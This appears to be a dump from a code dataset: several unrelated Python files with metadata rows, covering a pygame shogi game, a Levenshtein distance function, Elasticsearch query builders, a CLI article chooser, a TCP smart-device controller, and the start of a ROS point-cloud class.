screen.blit(text1,((403+66*i)//scale,966//scale))
for i in range(len(Bcount)):
text1 = myfont.render(str(Bcount[i]), True, (0, 0, 0))
screen.blit(text1,((403+66*i)//scale,46//scale))
def drawMove(screen, moveset, SQ_size):
for i in moveset:
p.draw.rect(screen, colors[3], p.rect.Rect(i[1]*SQ_size+xoffset, i[0]*SQ_size+yoffset, SQ_size, SQ_size))
def drawWin(screen, GO):
    if not GO[0] and GO[1]:
        gameOverText = myfont.render("Game Over, Black Wins", True, (0, 0, 0))
        p.draw.rect(screen, colors[2], p.rect.Rect(10//scale, 10//scale, 350//scale, 66//scale), 2)
        screen.blit(gameOverText, (20//scale, 10//scale))
    elif GO[0] and not GO[1]:
        gameOverText = myfont.render("Game Over, White Wins", True, (0, 0, 0))
        p.draw.rect(screen, colors[2], p.rect.Rect(10//scale, 10//scale, 350//scale, 66//scale), 2)
        screen.blit(gameOverText, (20//scale, 10//scale))
    ret = myfont.render("press backspace to return to menu or press esc to quit", True, (0, 0, 0))
    screen.blit(ret, (500//scale, 10//scale))

def drawTimer(screen, gs):
    p.draw.rect(screen, colors[2], p.rect.Rect(938//scale, 900//scale, 170//scale, 66//scale), 2)
    p.draw.rect(screen, colors[2], p.rect.Rect(938//scale, 966//scale, 170//scale, 66//scale), 2)
    p.draw.rect(screen, colors[2], p.rect.Rect(938//scale, 46//scale, 170//scale, 66//scale), 2)
    p.draw.rect(screen, colors[2], p.rect.Rect(938//scale, 112//scale, 170//scale, 66//scale), 2)
    Wtext = myfont.render("White Time", True, (0, 0, 0))
    Btext = myfont.render("Black Time", True, (0, 0, 0))
    screen.blit(Wtext, (938//scale, 906//scale))
    screen.blit(Btext, (938//scale, 60//scale))
    Wtime = myfont.render(str(round(gs.Wtimer, 3)), True, (0, 0, 0))
    screen.blit(Wtime, (938//scale, 974//scale))
    Btime = myfont.render(str(round(gs.Btimer, 3)), True, (0, 0, 0))
    screen.blit(Btime, (938//scale, 120//scale))
def setup():
    dimension = int(input("Enter dimension: "))
    timer = int(input("Enter times: "))
    #fixed: bool(input(...)) is True for any non-empty answer, so parse the reply explicitly
    WTM = input("White first? (y/n): ").strip().lower() in ("y", "yes")
    return [dimension, timer, WTM]
def gameOver(gs, Bmoves, Wmoves):
    gameover = False
    WCM = True
    BCM = True
    g = copy.deepcopy(gs)
    Bmoves1 = g.getMoves("Black")
    C = g.checkCheck("White", Bmoves1)
    if len(C) > 0:
        Wmoves = gs.getMoves("White")
        Bmoves = gs.getMoves("Black")
        WCM = gs.checkMate(copy.deepcopy(Wmoves), copy.deepcopy(Bmoves), C, "White", "Black")
        if not WCM:
            gameover = True
    g = copy.deepcopy(gs)
    Wmoves1 = g.getMoves("White")
    C = g.checkCheck("Black", Wmoves1)
    if len(C) > 0:
        Wmoves = gs.getMoves("White")
        Bmoves = gs.getMoves("Black")
        BCM = gs.checkMate(copy.deepcopy(Bmoves), copy.deepcopy(Wmoves), C, "Black", "White")
        if not BCM:
            gameover = True
    return [WCM, BCM, gameover]
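# (Note added for clarity) The return value reads as [white-ok, black-ok, finished]:
# WCM/BCM come back False from checkMate() when that side has no legal reply to
# check, which is why drawWin() treats GO == [False, True, ...] as a Black win.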
def main():
    #S = setup()
    S = Menu.main()
    if S is False:
        running = False
    else:
        #os.environ['SDL_VIDEO_CENTERED'] = '1'
        screen = p.display.set_mode((WIDTH, HEIGHT), p.FULLSCREEN)
        clock = p.time.Clock()
        screen.fill(p.color.Color("white"))
        MH = S[4]
        COLOR = [S[1], S[0]]
        SQ_size = (594//int(S[2][0]))//scale
        gs = shogiEngine1.GameState(S[2], True, S[5])
        start_ticks = p.time.get_ticks() #starter tick
        load_Images(SQ_size, S[3])
        running = True
        sqSelected = () #no square selected; keeps track of the last click of the user (tuple)
        playerClicks = [] #keep track of player clicks (2 tuples: [(6,4)])
        Wchecks = []
        Bchecks = []
        GO = [True, True, False]
        Wmoves = gs.getMoves("White")
        Bmoves = gs.getMoves("Black")
        Dfound = False
        quit = False
        movestack = []
        while running:
            if gs.whiteToMove and not GO[2] and gs.timer is not False:
                gs.Wtimer = gs.Wtimer - 1/15
            elif not gs.whiteToMove and not GO[2] and gs.timer is not False:
                gs.Btimer = gs.Btimer - 1/15
            if GO[2] or gs.Wtimer <= 0 or gs.Btimer <= 0:
                running = False
            for e in p.event.get():
                if e.type == p.QUIT:
                    running = False
                    quit = True
                elif e.type == p.KEYDOWN:
                    if e.key == p.K_ESCAPE:
                        running = False
                        quit = True
                elif e.type == p.MOUSEBUTTONDOWN:
                    location = p.mouse.get_pos() #x,y location of mouse
                    col = (location[0] - xoffset)//SQ_size
                    row = (location[1] - yoffset)//SQ_size
                    if (location[1] >= 900//scale and location[1] <= 966//scale and gs.whiteToMove) or (location[1] >= 112//scale and location[1] <= 178//scale and not gs.whiteToMove):
                        T = (location[0]-(403//scale))//(66//scale)
                        switch = {
                            0: "Lance",
                            1: "Night",
                            2: "Silver General",
                            3: "Gold General",
                            4: "Bishop",
                            5: "Rook",
                            6: "Pawn"
                        }
                        if gs.whiteToMove:
                            for i in gs.Wcapture:
                                if i.Name == switch.get(T):
                                    F = i
                                    Dfound = True
                        elif not gs.whiteToMove:
                            for i in gs.Bcapture:
                                if i.Name == switch.get(T):
                                    F = i
                                    Dfound = True
                    if gs.isInBoard(row, col):
                        if sqSelected == (row, col): #check if the user clicks the same square
                            sqSelected = () #deselect
                            playerClicks = [] #clear player clicks
                        elif gs.board[row][col].Name == "Null" and len(sqSelected) == 0 and not Dfound:
                            sqSelected = () #deselect
                            playerClicks = [] #clear player clicks
                        elif (gs.board[row][col].Color == "Black" and gs.whiteToMove == True and len(sqSelected) < 1) or (gs.board[row][col].Color == "White" and gs.whiteToMove == False and len(sqSelected) < 1):
                            sqSelected = () #deselect
                            playerClicks = [] #clear player clicks
                        else:
                            sqSelected = (row, col)
                            playerClicks.append(sqSelected) #append for both 1st and 2nd clicks
                        if len(playerClicks) == 2:
                            move = shogiEngine1.Move(playerClicks[0], playerClicks[1], copy.deepcopy(gs.board), copy.deepcopy(gs.whiteToMove), Wmoves, Bmoves, copy.deepcopy(gs.Wcapture), copy.deepcopy(gs.Bcapture), copy.deepcopy(gs.Wtimer), copy.deepcopy(gs.Btimer))
                            sqSelected = () #deselect
                            playerClicks = [] #clear player clicks
                            if gs.whiteToMove:
                                Valid = gs.validateMove(Wmoves, move)
                                if Valid == True:
                                    g = copy.deepcopy(gs)
                                    g.makeMove(copy.deepcopy(move))
                                    Bmoves1 = g.getMoves("Black")
                                    C = g.checkCheck("White", Bmoves1)
                            else:
                                Valid = gs.validateMove(Bmoves, move)
                                if Valid == True:
                                    g = copy.deepcopy(gs)
                                    g.makeMove(copy.deepcopy(move))
                                    Wmoves1 = g.getMoves("White")
                                    C = g.checkCheck("Black", Wmoves1)
                            if Valid == True and len(C) == 0:
                                movestack = []
                                move.pieceMoved.Promotable = move.checkPromote(move.pieceMoved)
                                gs.makeMove(move)
                                gs.moveLog.append(move) #log move
                                gs.whiteToMove = not gs.whiteToMove
                                Wmoves = gs.getMoves("White")
                                Bmoves = gs.getMoves("Black")
                                Wchecks = gs.checkCheck("White", Bmoves)
                                Bchecks = gs.checkCheck("Black", Wmoves)
                                move.pieceMoved.Promotable = move.checkPromote(move.pieceMoved)
                                if move.pieceMoved.Promotable == True and move.pieceMoved.Promotion != True:
                                    drawPromotion(screen)
                                    p.display.update()
                                    #print promote button
                                    Zrunning = True
                                    while Zrunning:
                                        for e in p.event.get():
                                            if e.type == p.QUIT:
                                                running = False
                                                Zrunning = False
                                            if e.type == p.MOUSEBUTTONDOWN:
                                                location = p.mouse.get_pos() #x,y location of mouse
                                                if location[0] >= 1000//scale and location[0] <= (1000+156)//scale and location[1] >= 1000//scale and location[1] <= (1000 + 156)//scale:
                                                    move.pieceMoved.Promotion = True
                                                    Zrunning = False
                                                elif location[0] >= (1000+156)//scale and location[0] <= (1000 + 2*156)//scale and location[1] >= 1000//scale and location[1] <= (1000 + 156)//scale:
                                                    Zrunning = False
                            else:
                                sqSelected = () #deselect
                                playerClicks = [] #clear player clicks
                            GO = gameOver(gs, Bmoves, Wmoves)
                        elif len(playerClicks) == 1 and Dfound == True:
                            if F.Name == "Pawn" or F.Name == "Night" or F.Name == "Lance":
                                if (row == 0 and gs.whiteToMove) or (row == 8 and not gs.whiteToMove):
                                    sqSelected = () #deselect
                                    playerClicks = [] #clear player clicks
                                    Dfound = False
                            if F.Name == "Pawn" and not F.Promotion:
                                for i in range(gs.dimensionsx):
                                    if gs.board[i][col].Name == F.Name and gs.board[i][col].Color == F.Color:
                                        sqSelected = () #deselect
                                        playerClicks = [] #clear player clicks
                                        Dfound = False
                                        break
                            if gs.board[row][col].Name == "Null":
                                movestack = []
                                if gs.whiteToMove:
                                    F.Color = "White"
                                    F.Direction = 1
                                    F.Position = (row, col)
                                    F.Promotable = False
                                    F.Promotion = False
                                    gs.board[row][col] = F
                                    #gs.board[row][col] = FPiece.Pawn("White", F.Name, (row, col), 1)
                                    c = 0
                                    for i in gs.Wcapture:
                                        if i.Name == F.Name:
                                            gs.Wcapture.pop(c)
                                            break
                                        c = c + 1
                                elif not gs.whiteToMove:
                                    F.Color = "Black"
                                    F.Direction = -1
                                    F.Position = (row, col)
                                    F.Promotable = False
                                    F.Promotion = False
                                    gs.board[row][col] = F
                                    c = 0
                                    for i in gs.Bcapture:
                                        if i.Name == F.Name:
                                            gs.Bcapture.pop(c)
                                            break
                                        c = c + 1
                                Dfound = False
                                gs.whiteToMove = not gs.whiteToMove
                            #add code to check if move causes checkmate
                            sqSelected = () #deselect
                            playerClicks = [] #clear player clicks
                            GO = gameOver(gs, Bmoves, Wmoves)
                    if location[0] >= 1506//scale and location[0] <= 1662//scale and location[1] >= 82//scale and location[1] <= 130//scale: #fixed: the upper bound was missing the //scale division
                        if len(gs.moveLog) != 0:
                            t = gs.moveLog.pop()
                            gs.board = t.boardHis
                            gs.whiteToMove = t.whiteMove
                            gs.Wcapture = t.boardCapW
                            gs.Bcapture = t.boardCapB
                            gs.Wtimer = t.timeW
                            gs.Btimer = t.timeB
                            Wmoves = gs.getMoves("White")
                            Bmoves = gs.getMoves("Black")
                            sqSelected = () #deselect
                            playerClicks = [] #clear player clicks
                            GO = gameOver(gs, Bmoves, Wmoves)
            drawGameState(screen, gs, playerClicks, Wmoves, Bmoves, GO, MH, COLOR, SQ_size)
            clock.tick(MAX_FPS)
            p.display.flip()
        if not quit:
            Erunning = True
            while Erunning:
                drawGameState(screen, gs, playerClicks, Wmoves, Bmoves, GO, MH, COLOR, SQ_size)
                clock.tick(MAX_FPS)
                p.display.flip()
                for e in p.event.get():
                    if e.type == p.QUIT:
                        Erunning = False
                        p.display.quit()
                        return False
                    if e.type == p.KEYDOWN:
                        if e.key == p.K_BACKSPACE:
                            Erunning = False
                            p.display.quit()
                            return True
                        elif e.key == p.K_ESCAPE:
                            Erunning = False
                            p.display.quit()
                            return False
if __name__ == "__main__":
    running = True
    while running:
        running = main()
| 43.537893 | 263 | 0.484164 | 2,774 | 23,554 | 4.086518 | 0.142394 | 0.019054 | 0.016673 | 0.022495 | 0.477064 | 0.440014 | 0.369972 | 0.320219 | 0.270995 | 0.251323 | 0 | 0.049256 | 0.389743 | 23,554 | 540 | 264 | 43.618519 | 0.739391 | 0.089879 | 0 | 0.412322 | 0 | 0 | 0.03322 | 0.001056 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030806 | false | 0.00237 | 0.014218 | 0 | 0.056872 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b4adf85d7a1a04cebb1c8771aa76f2f5d18e037 | 505 | py | Python | others/levenshtein.py | Mifour/Algorithms | 77cfafc49bc0130da0f6041b169a15053f81af87 | [
"MIT"
] | null | null | null | others/levenshtein.py | Mifour/Algorithms | 77cfafc49bc0130da0f6041b169a15053f81af87 | [
"MIT"
] | null | null | null | others/levenshtein.py | Mifour/Algorithms | 77cfafc49bc0130da0f6041b169a15053f81af87 | [
"MIT"
] | null | null | null | import numpy as np
def levenshtein(first, second):
	"""
	O(nm) time & space for words of n and m characters
	"""
	n = len(first)
	m = len(second)
	# fixed: the original used an n*m matrix seeded with arange(m)+i+1, which
	# skipped the last character comparison (it returned 2 for the totoro test
	# below). The standard DP needs an (n+1)*(m+1) table whose first row and
	# column hold the cost of building a prefix from the empty string.
	matrix = np.zeros((n + 1, m + 1), dtype=int)
	matrix[0, :] = np.arange(m + 1)
	matrix[:, 0] = np.arange(n + 1)
	for i in range(1, n + 1):
		for j in range(1, m + 1):
			matrix[i, j] = min(
				matrix[i-1, j] + 1,                                # deletion
				matrix[i, j-1] + 1,                                # insertion
				matrix[i-1, j-1] + int(first[i-1] != second[j-1])  # substitution
			)
	return matrix[n, m]
print(levenshtein('audi', 'lada'))
# expect 3
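# extra sanity check on the classic textbook pair (added; not in the original file)
print(levenshtein('kitten', 'sitting'))
# expect 3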
print(levenshtein('totoro', 'ototoro'))
# expect 1 | 21.956522 | 56 | 0.592079 | 94 | 505 | 3.180851 | 0.404255 | 0.026756 | 0.040134 | 0.073579 | 0.06689 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037688 | 0.211881 | 505 | 23 | 57 | 21.956522 | 0.713568 | 0.136634 | 0 | 0 | 0 | 0 | 0.049412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b52819344cdd9b254cb63f54c8459751f763cd8 | 2,781 | py | Python | dp_conceptual_search/ons/search/queries/ons_query_builders.py | flaxandteal/dp-conceptual-search | 16c6383a61ba5b7069337c2626a0dc243bfe9d35 | [
"MIT"
] | 3 | 2018-05-10T16:49:27.000Z | 2022-03-29T15:23:04.000Z | dp_conceptual_search/ons/search/queries/ons_query_builders.py | flaxandteal/dp-conceptual-search | 16c6383a61ba5b7069337c2626a0dc243bfe9d35 | [
"MIT"
] | 2 | 2018-09-20T06:37:27.000Z | 2018-11-12T12:05:08.000Z | dp_conceptual_search/ons/search/queries/ons_query_builders.py | flaxandteal/dp-conceptual-search | 16c6383a61ba5b7069337c2626a0dc243bfe9d35 | [
"MIT"
] | 3 | 2018-06-25T10:48:43.000Z | 2021-04-11T08:01:27.000Z | """
Defines a series of useful Elasticsearch queries for the ONS
"""
from typing import List
from elasticsearch_dsl import query as Q
from elasticsearch_dsl.aggs import A as Aggregation
from dp_conceptual_search.ons.search.fields import AvailableFields
from dp_conceptual_search.ons.search.content_type import ContentType
from dp_conceptual_search.search.query_helper import match, multi_match
def build_type_counts_query() -> Aggregation:
    """
    Helper method for generating ONS type counts aggregation
    :return:
    """
    return Aggregation("terms", field=AvailableFields.TYPE.value.name)


def build_departments_query(search_term: str) -> Q.Query:
    """
    Returns the ONS departments query
    :param search_term:
    :return:
    """
    return Q.Match(**{"terms": {"query": search_term, "type": "boolean"}})


def build_content_query(search_term: str, **kwargs) -> Q.DisMax:
    """
    Returns the default ONS content query
    :param search_term:
    :return:
    """
    q = Q.DisMax(
        queries=[
            Q.Bool(
                should=[
                    match(AvailableFields.TITLE_NO_DATES.value.name, search_term, type="boolean", boost=10.0,
                          minimum_should_match="1<-2 3<80% 5<60%"),
                    match(AvailableFields.TITLE_NO_STEM.value.name, search_term, type="boolean", boost=10.0,
                          minimum_should_match="1<-2 3<80% 5<60%"),
                    multi_match([AvailableFields.TITLE.value.field_name_boosted, AvailableFields.EDITION.value.field_name_boosted],
                                search_term, type="cross_fields", minimum_should_match="3<80% 5<60%")
                ]
            ),
            multi_match([AvailableFields.SUMMARY.value.name, AvailableFields.META_DESCRIPTION.value.name], search_term,
                        type="best_fields", minimum_should_match="75%"),
            match(AvailableFields.KEYWORDS.value.name, search_term, type="boolean", operator="AND"),
            multi_match([AvailableFields.CDID.value.name, AvailableFields.DATASET_ID.value.name], search_term),
            match(AvailableFields.SEARCH_BOOST.value.name, search_term, type="boolean", operator="AND", boost=100.0)
        ],
        **kwargs
    )

    return q


def build_function_score_content_query(query: Q.Query, content_types: List[ContentType], boost: float = 1.0) -> Q.Query:
    """
    Generate a function score query using ContentType weights
    :param query:
    :param content_types:
    :param boost:
    :return:
    """
    function_scores = []

    content_type: ContentType
    for content_type in content_types:
        function_scores.append(content_type.filter_function())

    return Q.FunctionScore(query=query, functions=function_scores, boost=boost)
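# Illustrative composition sketch (added; not part of the original module --
# the index name "ons" below is a placeholder assumption):
#
#   from elasticsearch_dsl import Search
#   s = Search(index="ons").query(build_content_query("gender pay gap"))
#   s.aggs.bucket("docCounts", build_type_counts_query())
#   response = s.execute()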
| 36.116883 | 144 | 0.667026 | 333 | 2,781 | 5.366366 | 0.282282 | 0.067152 | 0.054841 | 0.063794 | 0.225518 | 0.183548 | 0.148853 | 0.117515 | 0.071628 | 0.071628 | 0 | 0.016698 | 0.224739 | 2,781 | 76 | 145 | 36.592105 | 0.812152 | 0.134484 | 0 | 0.052632 | 0 | 0 | 0.056014 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.157895 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b574f2296ecb2d56b23821c1097178c52787f98 | 1,486 | py | Python | 02_crowsnest/crowsnest.py | leszekgrechowicz/tiny_python_projects | 792c21a9a56c1dbe35d1aa1d4959c030a7921acd | [
"MIT"
] | null | null | null | 02_crowsnest/crowsnest.py | leszekgrechowicz/tiny_python_projects | 792c21a9a56c1dbe35d1aa1d4959c030a7921acd | [
"MIT"
] | null | null | null | 02_crowsnest/crowsnest.py | leszekgrechowicz/tiny_python_projects | 792c21a9a56c1dbe35d1aa1d4959c030a7921acd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Author : Leszek Grechowicz <leszek_grechowicz@o2.pl>
Date : 2021-06-13
Purpose: Choose the correct article
"""
import argparse
# --------------------------------------------------
def get_args():
    """Get command-line arguments"""

    parser = argparse.ArgumentParser(
        description='Choose the correct article',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)

    parser.add_argument('mandatory',
                        metavar='word',
                        type=str,
                        help='A word - mandatory')

    parser.add_argument('-s', '--starboard',
                        action='store_true',
                        help='changes the side to “starboard”')

    return parser.parse_args()


# --------------------------------------------------
def make_sentence(word, side):
    """Produce a sentence with the article appropriate to the given word"""

    article = 'an' if word[0].lower() in ['a', 'e', 'i', 'o', 'u'] else 'a'
    if word[0].istitle():
        article = article.title()
    return f'Ahoy, Captain, {article} {word} off the {side} bow!'
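# Illustrative examples (added; not in the original):
#   make_sentence('octopus', 'larboard') -> 'Ahoy, Captain, an octopus off the larboard bow!'
#   make_sentence('Narwhal', 'starboard') -> 'Ahoy, Captain, A Narwhal off the starboard bow!'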
# --------------------------------------------------
def main():
    """Make a jazz noise here"""

    args = get_args()
    side = 'starboard' if args.starboard else 'larboard'
    mandatory_arg = args.mandatory
    print(make_sentence(mandatory_arg, side))


# --------------------------------------------------
if __name__ == '__main__':
    main()
| 25.62069 | 75 | 0.514132 | 147 | 1,486 | 5.061224 | 0.557823 | 0.043011 | 0.043011 | 0.061828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010554 | 0.234859 | 1,486 | 57 | 76 | 26.070175 | 0.643799 | 0.298789 | 0 | 0 | 0 | 0 | 0.193103 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.04 | 0 | 0.24 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5ae9e5749ec7396c079711e82dc60783ccf32d | 6,449 | py | Python | interpreter-server/buzzcommander.py | Anglia-Ruskin-IoT-Labs/avs-device-sdk | 68d4446b3ecbb81cab73d7701ec909f5f3603316 | [
"Apache-2.0"
] | null | null | null | interpreter-server/buzzcommander.py | Anglia-Ruskin-IoT-Labs/avs-device-sdk | 68d4446b3ecbb81cab73d7701ec909f5f3603316 | [
"Apache-2.0"
] | null | null | null | interpreter-server/buzzcommander.py | Anglia-Ruskin-IoT-Labs/avs-device-sdk | 68d4446b3ecbb81cab73d7701ec909f5f3603316 | [
"Apache-2.0"
] | 1 | 2018-08-22T14:35:08.000Z | 2018-08-22T14:35:08.000Z | #!/usr/bin/python3
import socket # used for TCP/IP communication
import smtplib # used to send email report
import time # used to insert current date in email report
import threading
class Buzzbox():
    # Constructor helper (called from __init__ below), saving constants
    def main(self, _ip: str, _port: int, _light: int, _led: int):
        self.BUZZBOX_IP = _ip
        self.BUZZBOX_PORT = int(_port)
        self.LEDNUM = int(_led)
        self.LIGHTNUM = int(_light)

    def TextCleanup(self, _text: str) -> set:
        ''' Text formatting and cleanup
        '''
        text = _text.lower()
        text = text.replace(":", "")
        text = text.replace(".", "")
        text = text.split()
        return set(text)

    def Command(self, _title: str, _text: str) -> str:
        """ Decision tree that sends commands
        to the BuzzBox based on the
        input text. Returns string
        feedback if the command went
        to the Box,
        returns None if the command was
        not valid.
        """
        text = self.TextCleanup(_text)
        # Preventing guide text from getting through
        # by limiting length
        if not len(text) > 5:
            # Decisions based on the Alexa text field
            # containing words
            if "turning" in text:
                if "heater" in text:
                    command = "HEATER_"
                    if "on" in text:
                        command += "ON"
                    elif "off" in text:
                        command += "OFF"
                    else:
                        return
                    return self.__ContactBuzzBox(command)
                elif "fan" in text:
                    command = "FAN_"
                    if "on" in text:
                        command += "ON"
                    elif "off" in text:
                        command += "OFF"
                    else:
                        return
                    return self.__ContactBuzzBox(command)
                elif "light" in text:
                    for item in text:
                        if item.isdigit():
                            lightNum = int(item)
                            if lightNum <= self.LIGHTNUM and lightNum > 0:
                                return self.__ContactBuzzBox(self.__LightCommandBuilder(lightNum, text))
                elif "led" in text:
                    for item in text:
                        if item.isdigit():
                            ledNum = int(item)
                            if ledNum <= self.LEDNUM and ledNum > 0:
                                return self.__ContactBuzzBox(self.__LedCommandBuilder(ledNum, text))
                elif "lights" in text:
                    messages = []
                    for x in range(1, (self.LIGHTNUM + 1)):
                        messages.append(str(self.__ContactBuzzBox(self.__LightCommandBuilder(x, text))))
                    return messages
                elif "leds" in text:
                    command = "LEDS_ALL"
                    if "off" in _text:
                        command += "OFF"
                    elif "red" in _text or "on" in _text:
                        command += "R"
                    elif "yellow" in _text:
                        command += "Y"
                    elif "green" in _text:
                        command += "G"
                    return self.__ContactBuzzBox(command)
                elif "all" in text or "everything" in text:
                    if "on" in text:
                        state = "ON"
                    elif "off" in text:
                        state = "OFF"
                    else:
                        return
                    messages = []
                    # LEDs
                    if state == "ON":
                        messages.append(self.__ContactBuzzBox("LEDS_ALLR"))
                    else:
                        messages.append(self.__ContactBuzzBox("LEDS_ALLOFF"))
                    # Lights
                    for x in range(1, (self.LIGHTNUM + 1)):
                        messages.append(str(self.__ContactBuzzBox(self.__LightCommandBuilder(x, text))))
                    # Heater and Fan
                    messages.append(self.__ContactBuzzBox("HEATER_" + state))
                    messages.append(self.__ContactBuzzBox("FAN_" + state))
                    return messages
                elif "reading" in text and ("display" in text or
                                            "interface" in text):
                    if "on" in text:
                        state = "ON"
                    elif "off" in text:
                        state = "OFF"
                    else:
                        return
                    # TODO iMirror connection
                    return "Reading display turned " + state
                else:
                    return

    def GetReadings(self, _title, _text):
        text = self.TextCleanup(_text)
        if not len(text) > 5:
            if "displaying" in text:
                command = "GET_"
                # fixed: the original tested the constant string "sensor ",
                # which is always truthy; the intent is clearly "sensor" in text
                if "motion" in text and "sensor" in text:
                    command += "MOTION"
                    return self.__ContactBuzzBox(command)
                elif "heater" in text:
                    command += "HEATER"
                    return self.__ContactBuzzBox(command)
                elif "fan" in text:
                    command += "FAN"
                    return self.__ContactBuzzBox(command)
                elif "light" in text and "level" in text:
                    command += "LUX"
                    return self.__ContactBuzzBox(command)
                elif "light" in text:
                    command += "LIGHT"
                    for item in text:
                        if item.isdigit():
                            lightNum = int(item)
                            if lightNum <= self.LIGHTNUM and lightNum > 0:
                                command += str(lightNum)
                                return self.__ContactBuzzBox(command)
                elif "led" in text:
                    command += "LED"
                    for item in text:
                        if item.isdigit():
                            ledNum = int(item)
                            if ledNum <= self.LEDNUM and ledNum > 0:
                                command += str(ledNum)
                                return self.__ContactBuzzBox(command)
                elif "temperature" in text:
                    command += "TEMPERATURE"
                    return self.__ContactBuzzBox(command)
                else:
                    return
            else:
                return

    #-----------------------------------------------
    # SUPPORT METHODS
    #-----------------------------------------------
    def __ContactBuzzBox(self, _command):
        # Prepare a newline-terminated control message for transmission
        TCP_IP = self.BUZZBOX_IP
        TCP_PORT = self.BUZZBOX_PORT
        BUFFER_SIZE = 80
        command = _command + "\n"
        command = command.encode('UTF-8')
        ## possible commands: HELLO\n ,
        MESSAGE = command  # Relays 1 permanent off
        # Open socket, send message, close socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(0.75)
        try:
            s.connect((TCP_IP, TCP_PORT))
            s.send(MESSAGE)
            data = s.recv(BUFFER_SIZE)
            s.close()
            return (_command + ": " + str(data))
        except socket.error:
            return "Connection to box not available"

    def SendCommand(self, _command):
        return self.__ContactBuzzBox(_command)

    def __LedCommandBuilder(self, _ledNum, _text):
        ''' Builds a command for the LEDs
        according to their number and the
        asked state. Returns the complete
        command.
        '''
        command = "LED" + str(_ledNum) + "_"
        if "off" in _text:
            command += "OFF"
        elif "red" in _text or "on" in _text:
            command += "R"
        elif "yellow" in _text:
            command += "Y"
        elif "green" in _text:
            command += "G"
        return command

    def __LightCommandBuilder(self, _lightNum, _text):
        ''' Builds a command for the lights
        according to their number and the
        asked state. Returns the complete
        command.
        '''
        command = "LIGHT" + str(_lightNum) + "_"
        if "on" in _text:
            command += "ON"
        elif "off" in _text:
            command += "OFF"
        elif "blink" in _text:
            command += "BLINK"
        else:
            return
        return command

    def __init__(self, _ip, _port, _light, _led):
        self.main(_ip, _port, _light, _led)
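# Illustrative usage (added; the IP, port, and device counts below are
# placeholder assumptions, not values from this project):
#   box = Buzzbox("192.168.0.42", 5000, _light=4, _led=4)
#   box.Command("", "turning light 2 on")
#   box.GetReadings("", "displaying temperature")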
| 27.917749 | 86 | 0.609862 | 786 | 6,449 | 4.843511 | 0.215013 | 0.072498 | 0.085369 | 0.089572 | 0.456527 | 0.345679 | 0.344628 | 0.344628 | 0.319149 | 0.315997 | 0 | 0.003993 | 0.262211 | 6,449 | 230 | 87 | 28.03913 | 0.796133 | 0.150876 | 0 | 0.548023 | 0 | 0 | 0.075741 | 0 | 0 | 0 | 0 | 0.004348 | 0 | 1 | 0.050847 | false | 0 | 0.022599 | 0.00565 | 0.220339 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5b5de9cc4bb46f2ff5bbbe7a01860b9bf18703 | 17,997 | py | Python | pointcloud_diff/scripts/PointCloudDiff.py | 565353780/pytorch-voxblox-plus-plus | fd319495b36651cf8c0c9244e0f664fac1afd5ca | [
"BSD-3-Clause"
] | null | null | null | pointcloud_diff/scripts/PointCloudDiff.py | 565353780/pytorch-voxblox-plus-plus | fd319495b36651cf8c0c9244e0f664fac1afd5ca | [
"BSD-3-Clause"
] | null | null | null | pointcloud_diff/scripts/PointCloudDiff.py | 565353780/pytorch-voxblox-plus-plus | fd319495b36651cf8c0c9244e0f664fac1afd5ca | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import numpy as np
import open3d as o3d
from time import time, sleep
import rospy
from sensor_msgs.point_cloud2 import read_points
from vpp_msgs.srv import GetMap
from tensorboard_logger_ros.msg import Scalar
from tensorboard_logger_ros.srv import ScalarToBool
point_move_dict = {
    "01": [-9.2, 0.1, 0],
    "02": [0.9, -1.6, 0],
    "03": [-8.3, -0.5, 0],
    "04": [7.35, -4.2, 0],
    "05": [0, -0.4, 0],
    "06": [-4.1, -3.32, 0]
}
DEBUG = False
class PointCloudDiff(object):
    def __init__(self):
        self.scene_pointcloud_folder_path = None

        # dataset data
        self.scene_pointcloud = None
        self.scene_point_num = None
        self.object_pointcloud_list = None
        self.merge_object_pointcloud = None
        self.valid_object_pointcloud_list = None
        self.merge_valid_object_pointcloud_list = None

        # recon data
        self.object_pointcloud_save_path = None
        self.object_last_create_time = None
        self.object_last_modify_time = None

        self.log_start_time = None
        self.last_log_time = None

        if not DEBUG:
            sleep(10)
